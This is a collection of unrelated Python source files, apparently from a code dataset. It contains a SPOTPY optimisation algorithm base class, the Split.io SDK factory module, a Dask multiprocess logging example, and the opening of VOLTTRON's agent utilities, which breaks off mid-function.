if self.optimization_direction == 'maximize':
text = '%i of %i, maximal objective function=%g, time remaining: %s' % (
self.rep, self.repetitions, self.objectivefunction_max, timestr)
if self.optimization_direction == 'grid':
text = '%i of %i, min objf=%g, max objf=%g, time remaining: %s' % (
self.rep, self.repetitions, self.objectivefunction_min, self.objectivefunction_max, timestr)
print(text)
self.last_print = time.time()
def print_status_final(self):
print('\n*** Final SPOTPY summary ***')
print('Total Duration: ' + str(round((time.time() - self.starttime), 2)) + ' seconds')
print('Total Repetitions:', self.rep)
if self.optimization_direction == 'minimize':
print('Minimal objective value: %g' % (self.objectivefunction_min))
print('Corresponding parameter setting:')
for i in range(self.parameters):
text = '%s: %g' % (self.parnames[i], self.params_min[i])
print(text)
if self.optimization_direction == 'maximize':
print('Maximal objective value: %g' % (self.objectivefunction_max))
print('Corresponding parameter setting:')
for i in range(self.parameters):
text = '%s: %g' % (self.parnames[i], self.params_max[i])
print(text)
if self.optimization_direction == 'grid':
print('Minimal objective value: %g' % (self.objectivefunction_min))
print('Corresponding parameter setting:')
for i in range(self.parameters):
text = '%s: %g' % (self.parnames[i], self.params_min[i])
print(text)
print('Maximal objective value: %g' % (self.objectivefunction_max))
print('Corresponding parameter setting:')
for i in range(self.parameters):
text = '%s: %g' % (self.parnames[i], self.params_max[i])
print(text)
print('******************************\n')
def __repr__(self):
return 'Min objectivefunction: %g \n Max objectivefunction: %g' % (
self.objectivefunction_min, self.objectivefunction_max)
class _algorithm(object):
"""
Implements an algorithm.
Input
----------
spot_setup: class
model: function
Should be callable with a parameter combination of the parameter-function
and return an list of simulation results (as long as evaluation list)
parameter: function
When called, it should return a random parameter combination. Which can
be e.g. uniform or Gaussian
objectivefunction: function
Should return the objectivefunction for a given list of a model simulation and
observation.
evaluation: function
Should return the true values as return by the model.
dbname: str
Name of the database where parameter, objectivefunction value and simulation
results will be saved.
dbformat: str
ram: fast suited for short sampling time. no file will be created and results are saved in an array.
csv: A csv file will be created, which you can import afterwards.
parallel: str
seq: Sequentiel sampling (default): Normal iterations on one core of your cpu.
mpc: Multi processing: Iterations on all available cores on your (single) pc
mpi: Message Passing Interface: Parallel computing on high performance computing clusters, py4mpi needs to be installed
save_threshold: float or list
Compares the given value/list of values with return value/list of values from spot_setup.objectivefunction.
If the objectivefunction value is higher, the results are saved in the database. If not they are ignored (saves storage).
db_precision:np.float type
set np.float16, np.float32 or np.float64 for rounding of floats in the output database
Default is np.float16
sim_timeout: float, int or None, default: None
the defined model given in the spot_setup class can be controlled to break after 'sim_timeout' seconds if
sim_timeout is not None.
If the model run has been broken simlply '[nan]' will be returned.
random_state: int or None, default: None
the algorithms uses the number in random_state as seed for numpy. This way stochastic processes can be reproduced.
"""
_unaccepted_parameter_types = (parameter.List, )
def __init__(self, spot_setup, dbname=None, dbformat=None, dbinit=True,
dbappend=False, parallel='seq', save_sim=True, breakpoint=None,
backup_every_rep=100, save_threshold=-np.inf, db_precision=np.float16,
sim_timeout=None, random_state=None, optimization_direction='grid', algorithm_name=''):
# Initialize the user defined setup class
self.setup = spot_setup
param_info = parameter.get_parameters_array(self.setup, unaccepted_parameter_types=self._unaccepted_parameter_types)
self.all_params = param_info['random']
self.constant_positions = parameter.get_constant_indices(spot_setup)
if self.constant_positions:
self.non_constant_positions = []
for i, val in enumerate(self.all_params):
if self.all_params[i] not in self.constant_positions:
self.non_constant_positions.append(i)
else:
self.non_constant_positions = np.arange(0,len(self.all_params))
self.parameter = self.get_parameters
self.parnames = param_info['name']
self.algorithm_name = algorithm_name
# Create a type to hold the parameter values using a namedtuple
self.partype = parameter.ParameterSet(param_info)
self.evaluation = self.setup.evaluation()
self.save_sim = save_sim
self.optimization_direction = optimization_direction
self.dbname = dbname or 'customDb'
self.dbformat = dbformat or 'ram'
self.db_precision = db_precision
self.breakpoint = breakpoint
self.backup_every_rep = backup_every_rep
# Two parameters to control the data base handling
# 'dbinit' triggers the initial creation of the data base file
# 'dbappend' used to append to the existing data base, after restart
self.dbinit = dbinit
self.dbappend = dbappend
# Set the random state
if random_state is None: #ToDo: Have to discuss if these 3 lines are neccessary.
random_state = np.random.randint(low=0, high=2**30)
np.random.seed(random_state)
# If value is not None a timeout will set so that the simulation will break after sim_timeout seconds without return a value
self.sim_timeout = sim_timeout
self.save_threshold = save_threshold
if breakpoint == 'read' or breakpoint == 'readandwrite':
print('Reading backupfile')
try:
open(self.dbname+'.break')
except FileNotFoundError:
print('Backupfile not found')
self.dbappend = True
# Now a repeater (ForEach-object) is loaded
# A repeater is a convinent wrapper to repeat tasks
# We have the same interface for sequential and for parallel tasks
if parallel == 'seq':
from spotpy.parallel.sequential import ForEach
elif parallel == 'mpi':
from spotpy.parallel.mpi import ForEach
# MPC is based on pathos mutiprocessing and uses ordered map, so results are given back in the order
# as the parameters are
elif parallel == 'mpc':
from spotpy.parallel.mproc import ForEach
# UMPC is based on pathos mutiprocessing and uses unordered map, so results are given back in the order
# as the subprocesses are finished which may speed up the whole simulation process but is not recommended if
# objective functions do their calculation based on the order of the data because the order of the result is chaotic
# and randomized
elif parallel == 'umpc':
from spotpy.parallel.umproc import ForEach
else:
raise ValueError(
"'%s' is not a valid keyword for parallel processing" % parallel)
# This is the repeater for the model runs. The simulate method does the work
# If you need different tasks, the repeater can be pushed into a "phase" using the
# setphase function. The simulate method can check the current phase and dispatch work
# to other functions. This is introduced for sceua to differentiate between burn in and
# the normal work on the chains
self.repeat = ForEach(self.simulate)
# method "save" needs to know whether objective function result is list or float, default is float
self.like_struct_typ = type(1.1)
def __str__(self):
return '{type}({mtype}())->{dbname}'.format(
type=type(self).__name__,
mtype=type(self.setup).__name__,
dbname=self.dbname)
def __repr__(self):
return '{type}()'.format(type=type(self).__name__)
def get_parameters(self):
"""
Returns the parameter array from the setup
"""
pars = parameter.get_parameters_array(self.setup)
return pars[self.non_constant_positions]
def set_repetiton(self, repetitions):
self.status = _RunStatistic(repetitions, self.algorithm_name,
self.optimization_direction, self.parnames)
# In MPI, this command will do nothing on the master process
# but the worker processes are going to wait for jobs.
# Hence the workers will only receive parameters for the
# simulate function, new calculation phases and the termination
self.repeat.start()
def final_call(self):
self.repeat.terminate()
try:
self.datawriter.finalize()
except AttributeError: # Happens if no database was assigned
pass
self.status.print_status_final()
def _init_database(self, like, randompar, simulations):
if self.dbinit:
print('Initialize database...')
self.datawriter = database.get_datawriter(self.dbformat,
self.dbname, self.parnames, like, randompar, simulations,
save_sim=self.save_sim, dbappend=self.dbappend,
dbinit=self.dbinit, db_precision=self.db_precision,
setup=self.setup)
self.dbinit = False
def __is_list_type(self, data):
if type(data) == type:
return data == list or data == type(np.array([]))
else:
return type(data) == list or type(data) == type(np.array([]))
def save(self, like, randompar, simulations, chains=1):
# Initialize the database if no run was performed so far
self._init_database(like, randompar, simulations)
# Test if like and the save threshold are float/list and compare accordingly
if self.__is_list_type(like) and self.__is_list_type(self.save_threshold):
if all(i > j for i, j in zip(like, self.save_threshold)): #Compares list/list
self.datawriter.save(like, randompar, simulations, chains=chains)
if (not self.__is_list_type(like)) and (not self.__is_list_type(self.save_threshold)):
if like>self.save_threshold: #Compares float/float
self.datawriter.save(like, randompar, simulations, chains=chains)
if self.__is_list_type(like) and (not self.__is_list_type(self.save_threshold)):
if like[0]>self.save_threshold: #Compares list/float
self.datawriter.save(like, randompar, simulations, chains=chains)
if (not self.__is_list_type(like)) and self.__is_list_type(self.save_threshold): #Compares float/list
if (like > self.save_threshold).all:
self.datawriter.save(like, randompar, simulations, chains=chains)
def read_breakdata(self, dbname):
''' Read data from a pickle file if a breakpoint is set.
Reason: In case of incomplete optimizations, old data can be restored. '''
import pickle
with open(dbname+'.break', 'rb') as breakfile:
work,backuptime,repos,obmin,obmax=pickle.load(breakfile)
self.status.starttime=self.status.starttime-backuptime
self.status.rep=repos
self.status.objectivefunction_min=obmin
self.status.objectivefunction_max=obmax
return work
def write_breakdata(self, dbname, work):
''' Write data to a pickle file if a breakpoint has been set.'''
import pickle
work=(work,self.status.last_print-self.status.starttime,self.status.rep,self.status.objectivefunction_min,self.status.objectivefunction_max)
with open(str(dbname)+'.break', 'wb') as breakfile:
pickle.dump(work, breakfile)
def getdata(self):
return self.datawriter.getdata()
def update_params(self, params):
#Add potential Constant parameters
self.all_params[self.non_constant_positions] = params
return self.all_params
def postprocessing(self, rep, params, simulation, chains=1, save_run=True, negativlike=False, block_print=False): # TODO: rep not necessaray
params = self.update_params(params)
if negativlike is True:
like = -self.getfitness(simulation=simulation, params=params)
else:
like = self.getfitness(simulation=simulation, params=params)
# Save everything in the database, if save is True
# This is needed as some algorithms just want to know the fitness,
# before they actually save the run in a database (e.g. sce-ua)
self.status(like,params,block_print=block_print)
if save_run is True and simulation is not None:
self.save(like, params, simulations=simulation, chains=chains)
if type(like)==type([]):
return like[0]
else:
return like
def getfitness(self, simulation, params):
"""
Calls the user defined spot_setup objectivefunction
"""
try:
#print('Using parameters in fitness function')
return self.setup.objectivefunction(evaluation=self.evaluation, simulation=simulation, params = (params,self.parnames))
except TypeError: # Happens if the user does not allow to pass parameter in the spot_setup.objectivefunction
#print('Not using parameters in fitness function')
return self.setup.objectivefunction(evaluation=self.evaluation, simulation=simulation)
def simulate(self, id_params_tuple):
"""This is a simple wrapper of the model, returning the result together with
the run id and the parameters. This is needed, because some parallel things
can mix up the ordering of runs
"""
id, params = id_params_tuple
self.all_params[self.non_constant_positions] = params #TODO: List parameters are not updated if not accepted for the algorithm, we may have to warn/error if list is given
all_params = self.all_params
# we need a layer to fetch returned data from a threaded process into a queue.
def model_layer(q,all_params):
# Call self.model with a namedtuple instead of another sequence
q.put(self.setup.simulation(self.partype(*all_params)))
# starting a queue, where in python2.7 this is a multiprocessing class and can cause errors because of
# incompability which the main thread. Therefore only for older Python version a workaround follows
que = Queue()
sim_thread = threading.Thread(target=model_layer, args=(que, all_params))
sim_thread.daemon = True
sim_thread.start()
# If self.sim_timeout is not None the self.model will break after self.sim_timeout seconds otherwise is runs as
# long it needs to run
sim_thread.join(self.sim_timeout)
# If no result from the thread is given, i.e. the thread was killed from the watcher the default result is
# '[nan]' and will not be saved. Otherwise get the result from the thread
model_result = None
if not que.empty():
model_result = que.get()
return id, params, model_result
|
factory.py
|
"""A module for Split.io Factories."""
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
import threading
from collections import Counter
from enum import Enum
import six
from splitio.client.client import Client
from splitio.client import input_validator
from splitio.client.manager import SplitManager
from splitio.client.config import DEFAULT_CONFIG
from splitio.client import util
from splitio.client.listener import ImpressionListenerWrapper
# Storage
from splitio.storage.inmemmory import InMemorySplitStorage, InMemorySegmentStorage, \
InMemoryImpressionStorage, InMemoryEventStorage, InMemoryTelemetryStorage
from splitio.storage.adapters import redis
from splitio.storage.redis import RedisSplitStorage, RedisSegmentStorage, RedisImpressionsStorage, \
RedisEventsStorage, RedisTelemetryStorage
from splitio.storage.adapters.uwsgi_cache import get_uwsgi
from splitio.storage.uwsgi import UWSGIEventStorage, UWSGIImpressionStorage, UWSGISegmentStorage, \
UWSGISplitStorage, UWSGITelemetryStorage
# APIs
from splitio.api.client import HttpClient
from splitio.api.splits import SplitsAPI
from splitio.api.segments import SegmentsAPI
from splitio.api.impressions import ImpressionsAPI
from splitio.api.events import EventsAPI
from splitio.api.telemetry import TelemetryAPI
# Tasks
from splitio.tasks.split_sync import SplitSynchronizationTask
from splitio.tasks.segment_sync import SegmentSynchronizationTask
from splitio.tasks.impressions_sync import ImpressionsSyncTask
from splitio.tasks.events_sync import EventsSyncTask
from splitio.tasks.telemetry_sync import TelemetrySynchronizationTask
# Localhost stuff
from splitio.client.localhost import LocalhostEventsStorage, LocalhostImpressionsStorage, \
LocalhostSplitSynchronizationTask, LocalhostTelemetryStorage
_LOGGER = logging.getLogger(__name__)
_INSTANTIATED_FACTORIES = Counter()
_INSTANTIATED_FACTORIES_LOCK = threading.RLock()
class Status(Enum):
"""Factory Status."""
NOT_INITIALIZED = 'NOT_INITIALIZED'
READY = 'READY'
DESTROYED = 'DESTROYED'
class TimeoutException(Exception):
"""Exception to be raised upon a block_until_ready call when a timeout expires."""
pass
class SplitFactory(object): # pylint: disable=too-many-instance-attributes
"""Split Factory/Container class."""
def __init__( # pylint: disable=too-many-arguments
self,
apikey,
storages,
labels_enabled,
apis=None,
tasks=None,
sdk_ready_flag=None,
impression_listener=None
):
"""
Class constructor.
:param storages: Dictionary of storages for all split models.
:type storages: dict
:param labels_enabled: Whether the impressions should store labels or not.
:type labels_enabled: bool
:param apis: Dictionary of apis client wrappers
:type apis: dict
:param tasks: Dictionary of sychronization tasks
:type tasks: dict
:param sdk_ready_flag: Event to set when the sdk is ready.
:type sdk_ready_flag: threading.Event
:param impression_listener: User custom listener to handle impressions locally.
:type impression_listener: splitio.client.listener.ImpressionListener
"""
self._apikey = apikey
self._logger = logging.getLogger(self.__class__.__name__)
self._storages = storages
self._labels_enabled = labels_enabled
self._apis = apis if apis else {}
self._tasks = tasks if tasks else {}
self._sdk_ready_flag = sdk_ready_flag
self._impression_listener = impression_listener
# If we have a ready flag, it means we have sync tasks that need to finish
# before the SDK client becomes ready.
if self._sdk_ready_flag is not None:
self._status = Status.NOT_INITIALIZED
# add a listener that updates the status to READY once the flag is set.
ready_updater = threading.Thread(target=self._update_status_when_ready)
ready_updater.setDaemon(True)
ready_updater.start()
else:
self._status = Status.READY
def _update_status_when_ready(self):
"""Wait until the sdk is ready and update the status."""
self._sdk_ready_flag.wait()
self._status = Status.READY
def _get_storage(self, name):
"""
Return a reference to the specified storage.
:param name: Name of the requested storage.
:type name: str
:return: requested factory.
:rtype: object
"""
return self._storages[name]
def client(self):
"""
Return a new client.
This client is only a set of references to structures hold by the factory.
Creating one a fast operation and safe to be used anywhere.
"""
return Client(self, self._labels_enabled, self._impression_listener)
def manager(self):
"""
Return a new manager.
This manager is only a set of references to structures hold by the factory.
Creating one a fast operation and safe to be used anywhere.
"""
return SplitManager(self)
def block_until_ready(self, timeout=None):
"""
Blocks until the sdk is ready or the timeout specified by the user expires.
:param timeout: Number of seconds to wait (fractions allowed)
:type timeout: int
"""
if self._sdk_ready_flag is not None:
ready = self._sdk_ready_flag.wait(timeout)
if not ready:
raise TimeoutException('SDK Initialization: time of %d exceeded' % timeout)
@property
def ready(self):
"""
Return whether the factory is ready.
:return: True if the factory is ready. False otherwhise.
:rtype: bool
"""
return self._status == Status.READY
def destroy(self, destroyed_event=None):
"""
Destroy the factory and render clients unusable.
Destroy frees up storage taken but split data, flushes impressions & events,
and invalidates the clients, making them return control.
:param destroyed_event: Event to signal when destroy process has finished.
:type destroyed_event: threading.Event
"""
if self.destroyed:
self._logger.info('Factory already destroyed.')
return
try:
if destroyed_event is not None:
stop_events = {name: threading.Event() for name in self._tasks.keys()}
for name, task in six.iteritems(self._tasks):
task.stop(stop_events[name])
def _wait_for_tasks_to_stop():
for event in stop_events.values():
event.wait()
destroyed_event.set()
wait_thread = threading.Thread(target=_wait_for_tasks_to_stop)
wait_thread.setDaemon(True)
wait_thread.start()
else:
for task in self._tasks.values():
task.stop()
finally:
self._status = Status.DESTROYED
with _INSTANTIATED_FACTORIES_LOCK:
_INSTANTIATED_FACTORIES.subtract([self._apikey])
@property
def destroyed(self):
"""
Return whether the factory has been destroyed or not.
:return: True if the factory has been destroyed. False otherwise.
:rtype: bool
"""
return self._status == Status.DESTROYED
def _wrap_impression_listener(listener, metadata):
"""
Wrap the impression listener if any.
:param listener: User supplied impression listener or None
:type listener: splitio.client.listener.ImpressionListener | None
:param metadata: SDK Metadata
:type metadata: splitio.client.util.SdkMetadata
"""
if listener is not None:
return ImpressionListenerWrapper(listener, metadata)
return None
def _build_in_memory_factory(api_key, config, sdk_url=None, events_url=None): # pylint: disable=too-many-locals
"""Build and return a split factory tailored to the supplied config."""
if not input_validator.validate_factory_instantiation(api_key):
return None
cfg = DEFAULT_CONFIG.copy()
cfg.update(config)
http_client = HttpClient(
sdk_url=sdk_url,
events_url=events_url,
timeout=cfg.get('connectionTimeout')
)
sdk_metadata = util.get_metadata(cfg)
apis = {
'splits': SplitsAPI(http_client, api_key),
'segments': SegmentsAPI(http_client, api_key),
'impressions': ImpressionsAPI(http_client, api_key, sdk_metadata),
'events': EventsAPI(http_client, api_key, sdk_metadata),
'telemetry': TelemetryAPI(http_client, api_key, sdk_metadata)
}
if not input_validator.validate_apikey_type(apis['segments']):
return None
storages = {
'splits': InMemorySplitStorage(),
'segments': InMemorySegmentStorage(),
'impressions': InMemoryImpressionStorage(cfg['impressionsQueueSize']),
'events': InMemoryEventStorage(cfg['eventsQueueSize']),
'telemetry': InMemoryTelemetryStorage()
}
# Synchronization flags
splits_ready_flag = threading.Event()
segments_ready_flag = threading.Event()
sdk_ready_flag = threading.Event()
tasks = {
'splits': SplitSynchronizationTask(
apis['splits'],
storages['splits'],
cfg['featuresRefreshRate'],
splits_ready_flag
),
'segments': SegmentSynchronizationTask(
apis['segments'],
storages['segments'],
storages['splits'],
cfg['segmentsRefreshRate'],
segments_ready_flag
),
'impressions': ImpressionsSyncTask(
apis['impressions'],
storages['impressions'],
cfg['impressionsRefreshRate'],
cfg['impressionsBulkSize']
),
'events': EventsSyncTask(
apis['events'],
storages['events'],
cfg['eventsPushRate'],
cfg['eventsBulkSize'],
),
'telemetry': TelemetrySynchronizationTask(
apis['telemetry'],
storages['telemetry'],
cfg['metricsRefreshRate']
)
}
# Start tasks that have no dependencies
tasks['splits'].start()
tasks['impressions'].start()
tasks['events'].start()
tasks['telemetry'].start()
storages['events'].set_queue_full_hook(tasks['events'].flush)
storages['impressions'].set_queue_full_hook(tasks['impressions'].flush)
def split_ready_task():
"""Wait for splits to be ready and start fetching segments."""
splits_ready_flag.wait()
tasks['segments'].start()
def segment_ready_task():
"""Wait for segments to be ready and set the main ready flag."""
segments_ready_flag.wait()
sdk_ready_flag.set()
split_completion_thread = threading.Thread(target=split_ready_task)
split_completion_thread.setDaemon(True)
split_completion_thread.start()
segment_completion_thread = threading.Thread(target=segment_ready_task)
segment_completion_thread.setDaemon(True)
segment_completion_thread.start()
return SplitFactory(
api_key,
storages,
cfg['labelsEnabled'],
apis,
tasks,
sdk_ready_flag,
impression_listener=_wrap_impression_listener(cfg['impressionListener'], sdk_metadata)
)
def _build_redis_factory(api_key, config):
"""Build and return a split factory with redis-based storage."""
cfg = DEFAULT_CONFIG.copy()
cfg.update(config)
sdk_metadata = util.get_metadata(cfg)
redis_adapter = redis.build(cfg)
cache_enabled = cfg.get('redisLocalCacheEnabled', False)
cache_ttl = cfg.get('redisLocalCacheTTL', 5)
storages = {
'splits': RedisSplitStorage(redis_adapter, cache_enabled, cache_ttl),
'segments': RedisSegmentStorage(redis_adapter),
'impressions': RedisImpressionsStorage(redis_adapter, sdk_metadata),
'events': RedisEventsStorage(redis_adapter, sdk_metadata),
'telemetry': RedisTelemetryStorage(redis_adapter, sdk_metadata)
}
return SplitFactory(
api_key,
storages,
cfg['labelsEnabled'],
impression_listener=_wrap_impression_listener(cfg['impressionListener'], sdk_metadata)
)
def _build_uwsgi_factory(api_key, config):
"""Build and return a split factory with redis-based storage."""
cfg = DEFAULT_CONFIG.copy()
cfg.update(config)
sdk_metadata = util.get_metadata(cfg)
uwsgi_adapter = get_uwsgi()
storages = {
'splits': UWSGISplitStorage(uwsgi_adapter),
'segments': UWSGISegmentStorage(uwsgi_adapter),
'impressions': UWSGIImpressionStorage(uwsgi_adapter),
'events': UWSGIEventStorage(uwsgi_adapter),
'telemetry': UWSGITelemetryStorage(uwsgi_adapter)
}
return SplitFactory(
api_key,
storages,
cfg['labelsEnabled'],
impression_listener=_wrap_impression_listener(cfg['impressionListener'], sdk_metadata)
)
def _build_localhost_factory(config):
"""Build and return a localhost factory for testing/development purposes."""
cfg = DEFAULT_CONFIG.copy()
cfg.update(config)
storages = {
'splits': InMemorySplitStorage(),
'segments': InMemorySegmentStorage(), # not used, just to avoid possible future errors.
'impressions': LocalhostImpressionsStorage(),
'events': LocalhostEventsStorage(),
'telemetry': LocalhostTelemetryStorage()
}
ready_event = threading.Event()
tasks = {'splits': LocalhostSplitSynchronizationTask(
cfg['splitFile'],
storages['splits'],
cfg['featuresRefreshRate'],
ready_event
)}
tasks['splits'].start()
return SplitFactory('localhost', storages, False, None, tasks, ready_event)
def get_factory(api_key, **kwargs):
"""Build and return the appropriate factory."""
try:
_INSTANTIATED_FACTORIES_LOCK.acquire()
if _INSTANTIATED_FACTORIES:
if api_key in _INSTANTIATED_FACTORIES:
_LOGGER.warning(
"factory instantiation: You already have %d %s with this API Key. "
"We recommend keeping only one instance of the factory at all times "
"(Singleton pattern) and reusing it throughout your application.",
_INSTANTIATED_FACTORIES[api_key],
'factory' if _INSTANTIATED_FACTORIES[api_key] == 1 else 'factories'
)
else:
_LOGGER.warning(
"factory instantiation: You already have an instance of the Split factory. "
"Make sure you definitely want this additional instance. "
"We recommend keeping only one instance of the factory at all times "
"(Singleton pattern) and reusing it throughout your application."
)
config = kwargs.get('config', {})
if api_key == 'localhost':
return _build_localhost_factory(config)
if 'redisHost' in config or 'redisSentinels' in config:
return _build_redis_factory(api_key, config)
if 'uwsgiClient' in config:
return _build_uwsgi_factory(api_key, config)
return _build_in_memory_factory(
api_key,
config,
kwargs.get('sdk_api_base_url'),
kwargs.get('events_api_base_url')
)
finally:
_INSTANTIATED_FACTORIES.update([api_key])
_INSTANTIATED_FACTORIES_LOCK.release()
|
example.py
|
"""
An example of how logging can be added to a Dask/Dask Distributed system where
workers are in different threads or processes.
"""
from dask import compute, delayed
from dask.distributed import Client
import logging
from logging.config import fileConfig
import logging.handlers
import multiprocessing
from random import choice, random
import time
LEVELS = [
logging.DEBUG,
logging.INFO,
logging.WARNING,
logging.ERROR,
logging.CRITICAL,
]
MESSAGES = [
'Example message #1',
'Example message #2',
'Example message #3',
]
def configure_logging():
"""
Configures the logger.
"""
if path.exists('logging.conf'):
fileConfig('logging.conf',
disable_existing_loggers=False,
defaults={'logfile_name': 'loggingdemo.log'})
else:
log_format = '%(asctime)s %(name)s %(levelname)-8s %(message)s'
logging.basicConfig(format=log_format)
def worker_logging_configurer(queue):
"""
Configures the logging for a worker process.
Args:
queue -- the queue to which messages should be sent.
"""
handler = logging.handlers.QueueHandler(queue)
root = logging.getLogger()
root.addHandler(handler)
root.setLevel(logging.DEBUG)
@delayed
def worker_task(task_id):
"""
This is a dummy task for a worker to run, it's simulating doing some work
and creating some random log messages and random levels.
Args:
id -- the id of this task so we can make it clean which is which in the
logging demo.
"""
name = f'{task_id}'
logger = logging.getLogger()
logger.info('Worker started: %s' % name)
for i in range(10):
time.sleep(random())
level = choice(LEVELS)
message = choice(MESSAGES)
logger.log(level, message)
logger.info('Worker finished: %s' % name)
class LogListener:
"""
Manages the Listener process and configuration of the message queue.
"""
def __init__(self, logging_configurer):
"""
Initialises the Log Listener and the queue and process used.
"""
self._logging_configurer = logging_configurer
self._manager = multiprocessing.Manager()
self._queue = self._manager.Queue(-1)
self._listener = None
@property
def queue(self):
"""
Exposes the queue which needs to be passed to other processes for
logging.
"""
return self._queue
def start(self):
"""
Start the Log Listener process
"""
self._listener = \
multiprocessing.Process(target=self._listener_process)
self._listener.start()
def stop(self):
"""
Stop the Log Listener process and clean up.
"""
self._queue.put_nowait(None)
self._listener.join()
def _listener_process(self):
"""
The logging main loop to be executed in the logging process.
"""
self._logging_configurer()
while True:
try:
record = self._queue.get()
# This as a sentinel to tell the listener to quit.
if record is None:
break
logger = logging.getLogger(record.name)
logger.handle(record)
except Exception:
import sys, traceback
print('Logging error:', file=sys.stderr)
traceback.print_exc(file=sys.stderr)
def main():
"""
This function represents the main function of your Dask based system.
In this example it creates a simple set of workers and launches some
dummy tasks that just create random log messages.
"""
# Configure the log listener and launch it in a seperate process
log_listener = LogListener(configure_logging)
log_listener.start()
# Launch some Dask workers
client = Client(threads_per_worker=1, n_workers=10)
# Run the log configuration code on each work in the Dask cluster
client.run(worker_logging_configurer, log_listener.queue)
# Create some dummmy task to run on the workers
# This is where your core computation would be in a real system.
tasks = [worker_task(i) for i in range(10)]
# Launch the work on the cluster
compute(tasks)
# This is the end of the core computation and now comes any cleanup code.
# Stop the log listener and clean up
log_listener.stop()
if __name__ == '__main__':
main()
|
utils.py
|
# -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
#
# Copyright 2017, Battelle Memorial Institute.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This material was prepared as an account of work sponsored by an agency of
# the United States Government. Neither the United States Government nor the
# United States Department of Energy, nor Battelle, nor any of their
# employees, nor any jurisdiction or organization that has cooperated in the
# development of these materials, makes any warranty, express or
# implied, or assumes any legal liability or responsibility for the accuracy,
# completeness, or usefulness or any information, apparatus, product,
# software, or process disclosed, or represents that its use would not infringe
# privately owned rights. Reference herein to any specific commercial product,
# process, or service by trade name, trademark, manufacturer, or otherwise
# does not necessarily constitute or imply its endorsement, recommendation, or
# favoring by the United States Government or any agency thereof, or
# Battelle Memorial Institute. The views and opinions of authors expressed
# herein do not necessarily state or reflect those of the
# United States Government or any agency thereof.
#
# PACIFIC NORTHWEST NATIONAL LABORATORY operated by
# BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
# under Contract DE-AC05-76RL01830
# }}}
"""VOLTTRON platform™ agent helper classes/functions."""
import argparse
import calendar
import errno
import logging
import sys
import syslog
import traceback
from datetime import datetime, tzinfo, timedelta
import gevent
import os
import pytz
import re
import stat
import time
import yaml
from volttron.platform import get_home, get_address
from dateutil.parser import parse
from dateutil.tz import tzutc, tzoffset
from tzlocal import get_localzone
from volttron.platform.agent import json as jsonapi
try:
from ..lib.inotify.green import inotify, IN_MODIFY
except AttributeError:
# inotify library is not available on OS X/MacOS.
# @TODO Integrate with the OS X FS Events API
inotify = None
IN_MODIFY = None
__all__ = ['load_config', 'run_agent', 'start_agent_thread',
'is_valid_identity']
__author__ = 'Brandon Carpenter <brandon.carpenter@pnnl.gov>'
__copyright__ = 'Copyright (c) 2016, Battelle Memorial Institute'
__license__ = 'FreeBSD'
_comment_re = re.compile(
r'((["\'])(?:\\?.)*?\2)|(/\*.*?\*/)|((?:#|//).*?(?=\n|$))',
re.MULTILINE | re.DOTALL)
_log = logging.getLogger(__name__)
# The following are the only allowable characters for identities.
_VALID_IDENTITY_RE = re.compile(r"^[A-Za-z0-9_.\-]+$")
def is_valid_identity(identity_to_check):
""" Checks the passed identity to see if it contains invalid characters
A None value for identity_to_check will return False
@:param: string: The vip_identity to check for validity
@:return: boolean: True if values are in the set of valid characters.
"""
if identity_to_check is None:
return False
return _VALID_IDENTITY_RE.match(identity_to_check)
def normalize_identity(pre_identity):
if is_valid_identity(pre_identity):
return pre_identity
if pre_identity is None:
raise ValueError("Identity cannot be none.")
norm = ""
for s in pre_identity:
if _VALID_IDENTITY_RE.match(s):
norm += s
else:
norm += '_'
return norm
def _repl(match):
"""Replace the matched group with an appropriate string."""
# If the first group matched, a quoted string was matched and should
# be returned unchanged. Otherwise a comment was matched and the
# empty string should be returned.
return match.group(1) or ''
def strip_comments(string):
"""Return string with all comments stripped.
Both JavaScript-style comments (//... and /*...*/) and hash (#...)
comments are removed.
"""
return _comment_re.sub(_repl, string)
def load_config(config_path):
"""Load a JSON-encoded configuration file."""
if config_path is None:
_log.info("AGENT_CONFIG does not exist in environment. load_config returning empty configuration.")
return {}
if not os.path.exists(config_path):
_log.info("Config file specified by AGENT_CONFIG does not exist. load_config returning empty configuration.")
return {}
# First attempt parsing the file with a yaml parser (allows comments natively)
# Then if that fails we fallback to our modified json parser.
try:
with open(config_path) as f:
return yaml.safe_load(f.read())
except yaml.scanner.ScannerError as e:
try:
with open(config_path) as f:
return parse_json_config(f.read())
except StandardError as e:
_log.error("Problem parsing agent configuration")
raise
def update_kwargs_with_config(kwargs, config):
"""
Loads the user defined configurations into kwargs.
1. Converts any dash/hyphen in config variables into underscores
2. Checks for configured "identity" value. Prints a deprecation
warning and uses it.
3. Checks for configured "agentid" value. Prints a deprecation warning
and ignores it
:param kwargs: kwargs to be updated
:param config: dictionary of user/agent configuration
"""
if config.get('identity') is not None:
_log.warning("DEPRECATION WARNING: Setting a historian's VIP IDENTITY"
" from its configuration file will no longer be supported"
" after VOLTTRON 4.0")
_log.warning(
"DEPRECATION WARNING: Using the identity configuration setting "
"will override the value provided by the platform. This new value "
"will not be reported correctly by 'volttron-ctl status'")
_log.warning("DEPRECATION WARNING: Please remove 'identity' from your "
"configuration file and use the new method provided by "
"the platform to set an agent's identity. See "
"scripts/core/make-mongo-historian.sh for an example of "
"how this is done.")
if config.get('agentid') is not None:
_log.warning("WARNING: Agent id cannot be configured. It is a unique "
"id assigned by VOLTTRON platform. Ignoring configured "
"agentid")
config.pop('agentid')
for k, v in config.items():
kwargs[k.replace("-","_")] = v
def parse_json_config(config_str):
"""Parse a JSON-encoded configuration file."""
return jsonapi.loads(strip_comments(config_str))
def run_agent(cls, subscribe_address=None, publish_address=None,
config_path=None, **kwargs):
"""Instantiate an agent and run it in the current thread.
Attempts to get keyword parameters from the environment if they
are not set.
"""
if not subscribe_address:
subscribe_address = os.environ.get('AGENT_SUB_ADDR')
if subscribe_address:
kwargs['subscribe_address'] = subscribe_address
if not publish_address:
publish_address = os.environ.get('AGENT_PUB_ADDR')
if publish_address:
kwargs['publish_address'] = publish_address
if not config_path:
